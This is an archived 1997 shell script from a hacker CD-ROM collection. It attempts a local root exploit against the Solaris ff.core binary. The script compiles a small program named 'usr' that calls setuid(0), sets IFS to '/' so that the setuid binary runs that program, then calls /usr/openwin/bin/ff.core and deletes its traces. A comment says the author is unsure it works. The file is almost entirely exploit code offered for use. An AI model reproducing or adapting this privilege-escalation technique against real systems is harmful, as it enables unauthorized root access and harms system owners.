home *** CD-ROM | disk | FTP | other *** search
/ For Beginners & Professional Hackers / cd.iso / hackers / exploits / solaris / sol-ff~1.asc < prev    next >
Encoding:
Text File  |  1997-03-11  |  416 b   |  19 lines
  1.  
  2.  
  3.  
  4.  
  5. #!/bin/sh -f
  6.  
  7. # try to exploit ff.core hole (?? does solaris honour suid IFS changes?)
  8.  
  9. cat > usr.c << _EOF_
  10.  
  11. main() {
  12.  
  13. printf("uid=%d gid=%d\n", getuid(), getgid());
  14.  
  15.  setuid(0); setgid(0); seteuid(0); setegid(0);
  16.  
  17.  printf("uid after set=%d\n", getuid());
  18.  
  19. }
  20.  
  21. _EOF_
  22.  
  23. cc -o usr usr.c
  24.  
  25. chmod 700 usr
  26.  
  27. IFS="/"
  28.  
  29. export IFS
  30.  
  31. /usr/openwin/bin/ff.core 0 0 0 0 0
  32.  
  33. #ffc 0 0 fd0/fd0 1
  34.  
  35. rm -f usr usr.c
  36.  
  37.